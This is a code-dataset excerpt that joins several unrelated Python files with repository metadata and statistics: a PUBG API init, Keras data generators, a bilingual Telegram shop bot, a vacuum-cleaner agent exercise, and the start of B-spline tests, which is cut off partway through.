"MIT"
] | null | null | null |
chicken_dinner/pubgapi/__init__.py
|
az7139/chicken-dinner
|
7b5c1c10cabe1ee335cae515d2d6a96ff431df80
|
[
"MIT"
] | null | null | null |
from chicken_dinner.pubgapi.core import PUBGCore
from chicken_dinner.pubgapi.pubg import PUBG
| 31.333333
| 48
| 0.87234
| 14
| 94
| 5.714286
| 0.571429
| 0.275
| 0.425
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 2
| 49
| 47
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
60568bc23d69cf8c9d1b6a9471359485f441411c
| 3,504
|
py
|
Python
|
Learn/archived/classes.py
|
ApocalyVec/mGesf
|
21e0bf37a9d11a3cdde86a8d54e2f6c6a2211ab5
|
[
"MIT"
] | 18
|
2020-06-02T11:21:47.000Z
|
2022-03-25T08:16:57.000Z
|
Learn/archived/classes.py
|
ApocalyVec/mGesf
|
21e0bf37a9d11a3cdde86a8d54e2f6c6a2211ab5
|
[
"MIT"
] | 4
|
2020-06-20T13:53:44.000Z
|
2021-09-11T22:58:21.000Z
|
Learn/archived/classes.py
|
ApocalyVec/mGesf
|
21e0bf37a9d11a3cdde86a8d54e2f6c6a2211ab5
|
[
"MIT"
] | 6
|
2020-04-23T21:30:17.000Z
|
2021-08-03T19:59:12.000Z
|
import os
import numpy as np
import keras
class indexPenDataGen(keras.utils.Sequence):
'Generates data for Keras'
def __init__(self, list_IDs, labels, batch_size=8, dim=(100, 1, 25, 25, 25),
n_classes=5, shuffle=True):
'Initialization'
self.dim = dim
self.batch_size = batch_size
self.labels = labels
self.list_IDs = list_IDs
self.n_classes = n_classes
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(len(self.list_IDs) / self.batch_size))
def __getitem__(self, index):
'Generate one batch of data'
# Generate indexes of the batch
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# Find list of IDs
list_IDs_temp = [self.list_IDs[k] for k in indexes]
# Generate data
X, y = self.__data_generation(list_IDs_temp)
return X, y
def on_epoch_end(self):
'Updates indexes after each epoch'
self.indexes = np.arange(len(self.list_IDs))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, list_IDs_temp):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((self.batch_size, *self.dim))
y = np.empty((self.batch_size), dtype=int)
# Generate data
for i, ID in enumerate(list_IDs_temp):
# Store sample
X[i,] = np.load('D:/indexPen/dataset/' + ID + '.npy')
# Store class
y[i] = self.labels[ID]
y = keras.utils.to_categorical(y, num_classes=self.n_classes)
return X, y
class thumouseDataGen(keras.utils.Sequence):
'Generates data for Keras'
def __init__(self, list_IDs, labels, batch_size=10, dim=(10, 1, 25, 25, 25), shuffle=True, dataset_path='D:/thumouse/dataset'):
'Initialization'
self.dim = dim
self.batch_size = batch_size
self.labels = labels
self.list_IDs = list_IDs
self.shuffle = shuffle
self.on_epoch_end()
self.dataset_path = dataset_path
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(len(self.list_IDs) / self.batch_size))
def __getitem__(self, index):
'Generate one batch of data'
# Generate indexes of the batch
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# Find list of IDs
list_IDs_temp = [self.list_IDs[k] for k in indexes]
# Generate data
X, y = self.__data_generation(list_IDs_temp)
return X, y
def on_epoch_end(self):
'Updates indexes after each epoch'
self.indexes = np.arange(len(self.list_IDs))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, list_IDs_temp):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((self.batch_size, *self.dim))
y = np.zeros((self.batch_size, 2))
# Generate data
for i, ID in enumerate(list_IDs_temp):
# Store sample
X[i,] = np.load(os.path.join(self.dataset_path, ID + '.npy'))
# Store class
y[i] = self.labels[ID]
return X, y
| 31.285714
| 131
| 0.608733
| 477
| 3,504
| 4.253669
| 0.184486
| 0.069
| 0.065057
| 0.0276
| 0.83588
| 0.827008
| 0.827008
| 0.797437
| 0.797437
| 0.768852
| 0
| 0.0104
| 0.28653
| 3,504
| 112
| 132
| 31.285714
| 0.8012
| 0.190639
| 0
| 0.788732
| 1
| 0
| 0.126919
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.140845
| false
| 0
| 0.042254
| 0
| 0.295775
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
606f0fbcee98e8e6346ea535a237f61ff9889c93
| 19,443
|
py
|
Python
|
handlers/users/product_menu_handler.py
|
Asadbek07/e-commerce-bot
|
df6c1bb625becf95bf53f4cece12752dca9f7f67
|
[
"Unlicense",
"MIT"
] | null | null | null |
handlers/users/product_menu_handler.py
|
Asadbek07/e-commerce-bot
|
df6c1bb625becf95bf53f4cece12752dca9f7f67
|
[
"Unlicense",
"MIT"
] | null | null | null |
handlers/users/product_menu_handler.py
|
Asadbek07/e-commerce-bot
|
df6c1bb625becf95bf53f4cece12752dca9f7f67
|
[
"Unlicense",
"MIT"
] | null | null | null |
from aiogram import types
from aiogram.dispatcher.filters.builtin import CommandHelp, CommandStart
from database.database import session, Customer, Product, Organization, savat
from loader import dp
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove
from aiogram.dispatcher.filters import Text, Regexp
from keyboards.default import amount_menu_uz, amount_menu_eng, products_menu_uz, products_menu_eng, menu_product_types_uz, menu_product_types_eng
from states.Customer_state import Customer_Form
from aiogram.dispatcher import FSMContext
@dp.message_handler(lambda message : message.text in [p.title for p in session.query(Product).all()], state=Customer_Form.product)
async def order_handler(message: types.Message, state : FSMContext):
user_id = message.from_user.id
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
language = customer.language
lang = "uz" if language == "🇺🇿O'zbekcha" else "eng"
keyboard = amount_menu_uz if lang == "uz" else amount_menu_eng
text = {
"uz" : {
"text" : "Miqdorini tanlang yoki kiriting",
"price" : "Narx : ",
},
"eng" : {
"text" : "Выберите или введите количество" ,
"price" : "Цена : "
}
}
postfix = {
"uz" : "so'm",
"eng" : "UZS"
}
title = message.text
await state.update_data({
"product" : title,
})
product = session.query(Product).filter(Product.title == title).first()
await Customer_Form.next()
price = int(product.price)
price = f"{price:,}".replace(',', ' ')
print(price)
caption = product.description
caption += f"\n{text[lang]['price']} {price} {postfix[lang]} "
await message.answer_photo(product.photo_id, caption=caption)
await message.answer(text[lang]["text"], reply_markup=keyboard)
@dp.message_handler(Text(equals="📥Savat"), state=Customer_Form.product)
async def order_uz(message : types.Message, state : FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) > 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Ortga", "🔄Tozalash"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Buyurtma berish"),))
text = "📥Savat\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} so'm\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Umumiy: </strong> {total_price} so'm"
await message.answer(text, reply_markup=keyboard)
await Customer_Form.savat.set()
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Sizning savatingiz bo'sh, buyrutma berish uchun mahsulot tanlang", reply_markup=products_menu_uz)
@dp.message_handler(Text(equals="📥Корзина"), state=Customer_Form.product)
async def order_eng(message : types.Message, state : FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) != 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Назад", "🔄Очистить"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Place an order"),))
text = "📥Корзина\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} UZS\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Общий: </strong> {total_price} UZS"
await message.answer(text, reply_markup=keyboard)
await Customer_Form.savat.set()
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Ваша корзина пуста, чтобы сделать заказ выберите продукты", reply_markup=products_menu_eng)
@dp.message_handler(Text(equals="⬅️Назад"), state=Customer_Form.product)
async def ortga_main_menu(message : types.Message, state : FSMContext):
text = "😃 Привет, оформим вместе заказ?"
keyboard = menu_product_types_eng
await message.answer(text, reply_markup=keyboard)
await state.reset_state()
@dp.message_handler(Text(equals="⬅️Ortga"), state=Customer_Form.product)
async def ortga_main_menu(message : types.Message, state : FSMContext):
text = "Juda yaxshi birgalikda buyurtma beramizmi? 😃"
keyboard = menu_product_types_uz
await message.answer(text, reply_markup=keyboard)
await state.reset_state()
@dp.message_handler(lambda message : message.text.isdigit(), state=Customer_Form.amount)
async def order_handler(message: types.Message, state : FSMContext):
user_id = message.from_user.id
amount = message.text
print("amount kirildi.")
await state.update_data({
"amount" : amount,
})
data = await state.get_data()
product_title = data.get("product")
amount = data.get("amount")
amount = int(amount)
product = session.query(Product).filter(Product.title == product_title).first()
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
lang = "uz" if customer.language == "🇺🇿O'zbekcha" else "eng"
if product in customer.products:
customer.products.remove(product)
session.commit()
customer_savat = savat.insert().values(customer_id=customer.customer_id, product_id=product.product_id, amount=amount)
session.execute(customer_savat)
session.commit()
text = {
"uz" : "Mahsulot tanlang",
"eng" : "Выберите продукт",
}
# O'zgardi keyboard uchun
products = session.query(Product).all()
titles = [p.title for p in products]
if lang == "uz":
titles.append("⬅️Ortga")
else:
titles.append("⬅️Назад")
products_menu_uz = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Savat"),
KeyboardButton(text="🚖Buyurtma berish")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_uz.add(*(KeyboardButton(text=title) for title in titles))
products_menu_eng = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Корзина"),
KeyboardButton(text="🚖Оформить заказ")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_eng.add(*(KeyboardButton(text=title) for title in titles))
keyboard = products_menu_uz if lang == "uz" else products_menu_eng
await message.answer(text[lang], reply_markup=keyboard)
await state.reset_state()
await Customer_Form.product.set()
@dp.message_handler(Text(equals="⬅️Назад", ignore_case=True), state=Customer_Form.amount)
async def ortga_product_list(message : types.Message, state : FSMContext):
await state.reset_state()
await Customer_Form.product.set()
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Корзина"),
KeyboardButton(text="🚖Оформить заказ")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_eng.add(*(KeyboardButton(text=title) for title in titles))
await message.answer("Выберите продукт", reply_markup=products_menu_eng)
@dp.message_handler(Text(equals="⬅️Ortga", ignore_case=True), state=Customer_Form.amount)
async def ortga_product_list(message : types.Message, state : FSMContext):
print("Ortga")
await state.reset_state()
await Customer_Form.product.set()
# O'zgardi keyboard uchun
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Savat"),
KeyboardButton(text="🚖Buyurtma berish")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_uz.add(*(KeyboardButton(text=title) for title in titles))
await message.answer("Mahsulot tanlang", reply_markup=products_menu_uz)
@dp.message_handler(Text(equals="📥Корзина", ignore_case=True), state=Customer_Form.amount)
async def order_eng2(message : types.Message, state : FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) > 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Назад", "🔄Очистить"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Palce an order"),))
text = "📥Корзина\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} UZS\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Общий: </strong> {total_price} UZS"
await Customer_Form.savat.set()
await message.answer(text, reply_markup=keyboard)
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Ваша корзина пуста, чтобы сделать заказ выберите продукты", reply_markup=products_menu_eng)
await Customer_Form.product.set()
@dp.message_handler(Text(equals="📥Savat", ignore_case=True), state=Customer_Form.amount)
async def order_uz2(message : types.Message, state : FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) > 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Ortga", "🔄Tozalash"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Buyurtma berish"),))
text = "📥Savat\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} so'm\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Umumiy: </strong> {total_price} so'm"
await Customer_Form.savat.set()
await message.answer(text, reply_markup=keyboard)
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Sizning savatingiz bo'sh, buyrutma berish uchun mahsulot tanlang", reply_markup=products_menu_uz)
await Customer_Form.product.set()
@dp.message_handler(Regexp(r"^🔄Tozalash$"), state=Customer_Form.savat)
async def order_handler(message: types.Message, state : FSMContext):
user_id = message.from_user.id
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
customer.products.clear()
session.commit()
text = "Juda yaxshi birgalikda buyrutma beramizmi? 😃"
print(f"{customer.username} savatini tozaladi {customer.products}")
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
await message.answer(text, reply_markup=products_menu_uz)
await Customer_Form.product.set()
@dp.message_handler(Regexp(r"^🔄Очистить$"), state=Customer_Form.savat)
async def order_handler(message: types.Message, state : FSMContext):
user_id = message.from_user.id
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
customer.products.clear()
session.commit()
text = "😃 Привет, оформим вместе заказ?"
print(f"{customer.username} cleared his savat {customer.products}")
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
await message.answer(text, reply_markup=products_menu_eng)
await Customer_Form.product.set()
@dp.message_handler(lambda message : message.text in ["❌ " + p.title for p in session.query(Product).all()], state=Customer_Form.savat)
async def order_handler(message: types.Message, state : FSMContext):
user_id = message.from_user.id
title = message.text.replace("❌ ", "")
print("title: ", title)
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
language = customer.language
lang = "uz" if language == "🇺🇿O'zbekcha" else "eng"
text = {
"uz" : "Juda yaxshi birgalikda buyrutma beramizmi? 😃",
"eng" : "😃 Привет, оформим вместе заказ?",
}
products = session.query(Product).all()
titles = [p.title for p in products]
if lang == "uz":
titles.append("⬅️Ortga")
else :
titles.append("⬅️Назад")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
keyboard = products_menu_uz if lang == "uz" else products_menu_eng
product = session.query(Product).filter(Product.title == title).first()
print(product in customer.products)
customer.products.remove(product)
session.commit()
await message.answer(text[lang], reply_markup=keyboard)
await Customer_Form.product.set()
| 42.084416
| 150
| 0.625521
| 2,305
| 19,443
| 5.185683
| 0.075488
| 0.038149
| 0.03313
| 0.016732
| 0.875596
| 0.867899
| 0.852673
| 0.83226
| 0.826571
| 0.80005
| 0
| 0.002309
| 0.242555
| 19,443
| 462
| 151
| 42.084416
| 0.802268
| 0.013424
| 0
| 0.745238
| 0
| 0
| 0.121923
| 0.011421
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021429
| 0
| 0.021429
| 0.02619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60e48ffae3d8fa6ad302511242ffa464565bf702
| 7,385
|
py
|
Python
|
main.py
|
HxnDev/Reflex-Agent-to-Solve-Vaccuum-Cleaner-World-Problem
|
cd805b0569505600358207e3abf0a84a05f1d8dd
|
[
"MIT"
] | 3
|
2021-07-25T06:19:21.000Z
|
2021-07-25T16:49:01.000Z
|
main.py
|
HxnDev/Reflex-Agent-to-Solve-Vaccuum-Cleaner-World-Problem
|
cd805b0569505600358207e3abf0a84a05f1d8dd
|
[
"MIT"
] | null | null | null |
main.py
|
HxnDev/Reflex-Agent-to-Solve-Vaccuum-Cleaner-World-Problem
|
cd805b0569505600358207e3abf0a84a05f1d8dd
|
[
"MIT"
] | null | null | null |
# These are pre-defined knowledge for my agent
goalState = {'A' : '0' , 'B' : '0' , 'C' : '0'}
action = 0 # 0 = Clean , 1 = Dirty
cost = 0
roomStates = {'A' : '0' , 'B' : '0' , 'C' : '0'}
#initial input
print ("Enter the starting location of vacuum (A/B/C) = ")
location = input()
print()
for room in roomStates:
action = input("Enter the state of " + room + " (0 for clean /1 for dirty): ")
roomStates[room] = action
#General Outputs
print()
print("\nCurrent State: " + str(roomStates))
print("\nGoal state: " + str(goalState))
print("\n Vacuum is placed in location " + location)
if (roomStates != goalState) :
#If the starting location is room A
if (location == 'A'):
if (roomStates['A'] == '1'): #if dirty
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If A is clean. Going from A -> B
else:
print("\nA is clean")
print("\nA -> B")
print("\nCost for moving within rooms = 1")
cost+=1
if (roomStates['B'] == '1'):#If B is dirty
roomStates['B'] = '0'
cost+=1
print("Location B was dirty\nLocation B has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#As goal state wasn't met, this means that room C is dirty
else:
print("\nA and B are clean but C is dirty")
print("\nB -> C")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If the starting location is room B
elif (location == "B"):
if(roomStates['B'] == '1'): #B is dirty
roomStates['B'] = '0'
cost+=1
print("Location B was dirty\nLocation B has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If B is clean, then we will move to A first
else:
print("\nB is clean")
print("\nB -> A")
print("\nCost for moving within rooms = 1")
cost+=1
if(roomStates['A'] == '1'): #A is dirty
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
# As goal state failed, it means that C is still dirty. We will now move from A->B and then B->C
else:
print("\nA is clean")
print("\nA -> B")
print("\nCost for moving within rooms = 1")
cost+=1
print("\nB is also clean")
print("\nB -> C")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
elif(roomStates['C'] == '1'): #C is Dirty
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
# As goal state failed, it means that A is still dirty. We will now move from C->B and then B->A
else:
print("\nC is clean")
print("\nC -> B")
print("\nCost for moving within rooms = 1")
cost+=1
print("\nB is also clean")
print("\nB -> A")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If the starting location is room C
elif(location == 'C'):
if (roomStates['C'] == '1'): #if dirty
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If C is clean. Going from C -> B
else:
print("\nC is clean")
print("\nC -> B")
print("\nCost for moving within rooms = 1")
cost+=1
if (roomStates['B'] == '1'):#If B is dirty
roomStates['B'] = '0'
cost+=1
print("Location B was dirty\nLocation B has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#As goal state wasn't met, this means that room A is dirty
else:
print("\nB and C are clean but A is dirty")
print("\nB -> A")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
else:
print("\nInvalid Start Location")
else:
print("\nAll rooms are already clean")
print("\nPerformance Measurement: " + str(cost))
| 38.463542
| 112
| 0.464997
| 821
| 7,385
| 4.182704
| 0.102314
| 0.044846
| 0.052999
| 0.108328
| 0.785964
| 0.775772
| 0.764415
| 0.764415
| 0.747525
| 0.747525
| 0
| 0.016367
| 0.420853
| 7,385
| 191
| 113
| 38.664921
| 0.786533
| 0.092485
| 0
| 0.834532
| 0
| 0
| 0.330139
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.496403
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
880ae4d7a6befeb19cf60ee8e84e0b39188a3402
| 32,463
|
py
|
Python
|
aslam_nonparametric_estimation/bsplines_python/test/BSplineTests.py
|
bhirschel/kalibr
|
e25b9728341fe85b55d46f850f657a55ed9000e6
|
[
"BSD-4-Clause"
] | 64
|
2021-04-14T02:37:39.000Z
|
2022-03-29T03:29:44.000Z
|
aslam_nonparametric_estimation/bsplines_python/test/BSplineTests.py
|
bhirschel/kalibr
|
e25b9728341fe85b55d46f850f657a55ed9000e6
|
[
"BSD-4-Clause"
] | null | null | null |
aslam_nonparametric_estimation/bsplines_python/test/BSplineTests.py
|
bhirschel/kalibr
|
e25b9728341fe85b55d46f850f657a55ed9000e6
|
[
"BSD-4-Clause"
] | 28
|
2021-04-13T06:45:04.000Z
|
2022-03-30T08:59:12.000Z
|
#!/usr/bin/env python
import roslib; roslib.load_manifest('bsplines');
import bsplines
import numpy
import scipy.interpolate.fitpack as fp
import scipy.integrate as si
import sys
import unittest
def createUniformKnotBSpline(order,segments,dim,knotSpacing=1.0):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)*knotSpacing
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
def createExponentialKnotBSpline(order,segments,dim,knotSpacing=1.0):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.zeros(kr)
for i in range(0,kr):
knots[i] = knotSpacing * 2**i
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
def createRandomKnotBSpline(order,segments,dim):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.random.random(kr)*10
knots.sort()
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
def createRandomRepeatedKnotBSpline(order,segments,dim):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.random.random(kr)*10
knots.sort()
for i in range(0,len(knots)):
if i&1:
knots[i-1] = knots[i]
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
class BSplineTestCase(unittest.TestCase):
def runTest(self):
x=0
def assertMatricesEqual(self,M1, M2, tolerance, msg):
